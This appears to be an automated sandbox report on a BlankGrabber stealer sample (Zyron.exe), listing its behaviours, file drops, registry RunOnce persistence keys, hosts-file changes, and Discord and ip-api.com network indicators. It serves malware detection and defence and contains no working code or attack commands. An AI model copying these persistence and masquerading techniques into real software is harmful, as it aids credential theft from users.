Malware Analysis Report

2024-10-16 07:05

Sample ID 240531-vtcvqsfg83
Target Zyron.exe
SHA256 a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30
Tags
blankgrabber evasion execution persistence spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30

Threat Level: Known bad

The file Zyron.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion execution persistence spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Modifies visibility of hidden/system files in Explorer

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Enumerates system info in registry

Opens file in notepad (likely ransom note)

Suspicious use of SendNotifyMessage

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Gathers system information

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Runs ping.exe

Detects videocard installed

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 17:16

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 17:16

Reported

2024-05-31 17:20

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

Signatures

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn \??\c:\windows\resources\svchost.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
